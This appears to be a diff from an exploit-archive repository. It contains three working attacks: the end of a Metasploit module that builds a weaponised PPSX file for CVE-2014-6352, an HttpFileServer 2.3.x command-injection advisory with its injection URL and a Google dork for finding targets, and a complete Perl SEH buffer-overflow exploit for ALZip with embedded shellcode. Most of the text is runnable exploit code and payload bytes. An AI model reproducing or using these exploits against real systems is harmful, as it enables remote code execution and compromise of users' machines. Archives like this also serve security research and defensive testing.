'sinn3r', # Metasploit module
'juan vazquez' # Metasploit module
],
'References' =>
[
['CVE', '2014-6352'],
['MSB', 'MS14-064'],
['BID', '70690'],
['URL', 'http://blogs.mcafee.com/mcafee-labs/bypassing-microsofts-patch-sandworm-zero-day-even-editing-dangerous']
],
'Payload' =>
{
'Space' => 2048,
'DisableNops' => true
},
'Platform' => 'win',
'Arch' => ARCH_X86,
'Targets' =>
[
['Windows 7 SP1 / Office 2010 SP2 / Office 2013', {}],
],
'Privileged' => false,
'DisclosureDate' => "Oct 21 2014",
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [true, 'The PPSX file', 'msf.ppsx'])
], self.class)
end
def exploit
print_status("Creating '#{datastore['FILENAME']}' file ...")
ole_stream = ole_packager
zip = zip_ppsx(ole_stream)
file_create(zip)
end
def zip_ppsx(ole_stream)
zip_data = {}
data_dir = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2014-6352', 'template_run_as_admin')
Dir["#{data_dir}/**/**"].each do |file|
unless File.directory?(file)
zip_data[file.sub(data_dir,'')] = File.read(file)
end
end
# add the otherwise skipped "hidden" file
file = "#{data_dir}/_rels/.rels"
zip_data[file.sub(data_dir,'')] = File.read(file)
# put our own OLE streams
zip_data['/ppt/embeddings/oleObject1.bin'] = ole_stream
# create the ppsx
ppsx = Rex::Zip::Archive.new
zip_data.each_pair do |k,v|
ppsx.add_file(k,v)
end
ppsx.pack
end
def ole_packager
payload_name = "#{rand_text_alpha(4)}.exe"
file_info = [2].pack('v')
file_info << "#{payload_name}\x00"
file_info << "#{payload_name}\x00"
file_info << "\x00\x00"
extract_info = [3].pack('v')
extract_info << [payload_name.length + 1].pack('V')
extract_info << "#{payload_name}\x00"
p = generate_payload_exe
file = [p.length].pack('V')
file << p
append_info = [payload_name.length].pack('V')
append_info << Rex::Text.to_unicode(payload_name)
append_info << [payload_name.length].pack('V')
append_info << Rex::Text.to_unicode(payload_name)
append_info << [payload_name.length].pack('V')
append_info << Rex::Text.to_unicode(payload_name)
ole_data = file_info + extract_info + file + append_info
ole_contents = [ole_data.length].pack('V') + ole_data
ole = create_ole("\x01OLE10Native", ole_contents)
ole
end
def create_ole(stream_name, data)
ole_tmp = Rex::Quickfile.new('ole')
stg = Rex::OLE::Storage.new(ole_tmp.path, Rex::OLE::STGM_WRITE)
stm = stg.create_stream(stream_name)
stm << data
stm.close
directory = stg.instance_variable_get(:@directory)
directory.each_entry do |entry|
if entry.instance_variable_get(:@_ab) == 'Root Entry'
# 0003000C-0000-0000-c000-000000000046 # Packager
clsid = Rex::OLE::CLSID.new("\x0c\x00\x03\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x46")
entry.instance_variable_set(:@_clsId, clsid)
end
end
# write to disk
stg.close
ole_contents = File.read(ole_tmp.path)
ole_tmp.close
ole_tmp.unlink
ole_contents
end
end

5
platforms/windows/remote/34668.txt
View file

@ -1,5 +1,3 @@
Affected software: http://sourceforge.net/projects/hfs/
Version : 2.3x
# Exploit Title: HttpFileServer 2.3.x Remote Command Execution
# Google Dork: intext:"httpfileserver 2.3"
# Date: 11-09-2014
@ -23,3 +21,6 @@ it will not handle null byte so a request to
http://localhost:80/search=%00{.exec|cmd.}
will stop regex from parse macro , and macro will be executed and remote code injection happen.
## EDB Note: This vulnerability will run the payload multiple times. Make sure to take this into consideration when crafting your payload.

145
platforms/windows/remote/35241.pl Executable file
View file

@ -0,0 +1,145 @@
source: http://www.securityfocus.com/bid/45917/info
ESTsoft ALZip is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data.
Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions.
ESTsoft ALZip 8.12.0.3 is vulnerable; other versions may also be affected.
#
#
#[+]Exploit Title: Exploit Buffer Overflow AlZip(SEH)
#[+]Date: 01\19\2010
#[+]Author: C4SS!0 G0M3S
#[+]Software Link: http://www.altools.com/al/downloads/alzip/ALZip812.exe
#[+]Version: 8.12.0.3
#[+]Tested on: WIN-XP SP3 PORTUGUESE BRAZILIAN
#[+]CVE: N/A
#
#
#
#Note:Exploit for the work you have to run program in DOS
#
#C: \> Exploit.pl exploit.zip
#
#In this case my Exploit Creates the zip file exploit.zip
#In the open ALZip Click "OPEN"pass the mouse over the specially crafted file and
#keeps the mouse on top of the file does not click on it and wait then BOOM APPEARS THE CALC
#
#Watch This Video: http://www.youtube.com/watch?v=PTV_tZinI6w
#
#
# ######### ## ######### ######### ## ###############
# ######## #### ######### ######### ## ## ##
# ## ## ## ## ## ## ## ##
# ## ## ## ## ## ## ## ##
# ## ########## ######## ######## ## ## ##
# ## ## ## ## ## ## ##
# ## ## ## ## ## ## ##
# ######## ## ######## ######### ## ## ##
# ######## ## ######## ######### \/ ###############
#
#
#
#
use strict;
use warnings;
system("cls");
system("color 4f");
sub USAGE
{
print q
{
#############################################
# #
# Exploit Buffer Overflow AlZip(SEH) #
# C4SS!0 G0M3S #
# Louredo_@hotmail.com #
# Site http://www.invasao.com.br #
# #
#############################################
[+]Exploit: Exploit Buffer Overflow AlZip(SEH)
[+]Date: 01\\19\\2010
[+]Auhtor: C4SS!0 G0M3S
[+]Home: http://www.invasao.com.br
[+]E-mail: Louredo_@hotmail.com
[+]Version: 8.12.0.3
[+]Impact: Critical
Note:
Look Comments Above for More Information as the Exploit Works
};
}
if($#ARGV!=0)
{
USAGE;
print "[-]Usage: $0 <File_Name>\n";
print "[-]Exemple: $0 Exploit.zip\n";
exit(0);
}
my $sploitfile=$ARGV[0];
my $ldf_header = "\x50\x4B\x03\x04\x14\x00\x00".
"\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" .
"\x00\x00\x00\x00\x00\x00\x00\x00" .
"\xe4\x0f" .
"\x00\x00\x00";
my $cdf_header = "\x50\x4B\x01\x02\x14\x00\x14".
"\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" .
"\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\xe4\x0f".
"\x00\x00\x00\x00\x00\x00\x01\x00".
"\x24\x00\x00\x00\x00\x00\x00\x00";
my $eofcdf_header = "\x50\x4B\x05\x06\x00\x00\x00".
"\x00\x01\x00\x01\x00".
"\x12\x10\x00\x00".
"\x02\x10\x00\x00".
"\x00\x00";
USAGE;
print "[*]Identifying the Length Shellcode\n";
sleep(1);
my $shellcode =
"\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1" .
"\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30" .
"\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa" .
"\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96" .
"\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b" .
"\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a" .#Shellcode WINEXEC CALC
"\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83" .
"\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98" .
"\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61" .
"\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05" .
"\x7f\xe8\x7b\xca";
my $payload = "A" x 1060;
$payload .= "\xeb\x08\x90\x90";
$payload .= pack(&#039;V&#039;,0x61309258);
$payload .= "\x90" x 10;
$payload .= $shellcode;
print "[*]The length Shellcode:".length($shellcode)."\n";
sleep(1);
$payload .= "\x42" x (4064 - length($payload));
$payload=$payload.".txt";
my $evilzip = $ldf_header.$payload.
$cdf_header.$payload.
$eofcdf_header;
print "[*]Creating the File $ARGV[0]\n";
sleep(1);
open(FILE,">$sploitfile") or die("ERROR:$!");
print FILE $evilzip;
close(FILE);
print "[*]The File $ARGV[0] was Successfully Created\n";
sleep(1);